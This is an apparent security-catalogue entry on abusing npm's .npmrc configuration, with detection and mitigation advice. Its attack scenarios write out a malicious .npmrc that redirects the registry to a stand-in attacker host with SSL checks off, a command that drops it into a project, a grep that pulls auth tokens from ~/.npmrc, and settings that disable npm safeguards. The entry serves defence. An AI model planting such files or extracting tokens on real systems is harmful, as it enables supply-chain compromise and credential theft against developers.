.npmrc Manipulation

npm Configuration Abuse medium Linux macOS Windows
.npmrc files control npm behavior including registry URLs, authentication tokens, and script execution settings. An attacker with file write access to a project or user-level .npmrc can redirect all package installations to a malicious registry, steal auth tokens, or re-enable dangerous script execution. Because npm loads .npmrc from multiple locations (project, user, global), a single malicious file can silently compromise an entire development workflow.

Prerequisites

  • Write access to the target filesystem (project directory, user home directory, or global npm config)
  • Target must subsequently run npm install or similar npm commands

Attack Scenarios

Redirecting Registry to a Malicious Server

An attacker with write access to the project directory places a .npmrc file that points the npm registry to an attacker-controlled server. All subsequent npm install commands will fetch trojanized packages from the malicious registry instead of the official one.

Malicious .npmrc redirecting the default registry
registry=https://evil-registry.example.com/
strict-ssl=false
Dropping the malicious .npmrc into a project
echo -e "registry=https://evil-registry.example.com/\nstrict-ssl=false" > /path/to/project/.npmrc

Stealing npm Auth Tokens

If a developer's ~/.npmrc contains an auth token for publishing packages, an attacker with read access to the home directory can extract the token and use it to publish malicious versions of the developer's packages.

Extracting auth tokens from ~/.npmrc
cat ~/.npmrc | grep '_authToken'
# Output: //registry.npmjs.org/:_authToken=npm_XXXXXXXXXXXX

Disabling Security Controls via .npmrc

An attacker modifies .npmrc to disable ignore-scripts, disable strict SSL verification, or allow running as root, weakening the security posture of npm operations.

.npmrc that disables security protections
ignore-scripts=false
strict-ssl=false
unsafe-perm=true
audit=false

Detection

Audit .npmrc Files Across All Locations

Regularly check for .npmrc files in project directories, user home directories, and global npm config paths. Verify that registry URLs point to expected registries and that no unexpected auth tokens are present.

npm config list -l 2>/dev/null | grep -E 'registry|_authToken|strict-ssl|ignore-scripts'
find / -name '.npmrc' -type f 2>/dev/null | head -20

Monitor .npmrc Changes in Version Control

Ensure .npmrc files in project repositories are tracked in version control and changes are reviewed. Use CI/CD checks to validate that the registry URL has not been tampered with.

git diff HEAD -- .npmrc

Mitigation

  • Track .npmrc files in version control and require code review for any changes to registry or auth settings
  • Never store auth tokens in project-level .npmrc files; use environment variables or npm login sessions instead
  • Enforce strict-ssl=true and verify registry URLs in CI/CD pipeline pre-checks
  • Use file integrity monitoring to detect unauthorized changes to .npmrc in developer home directories
  • Restrict filesystem write access on CI/CD build agents to prevent unauthorized .npmrc placement

References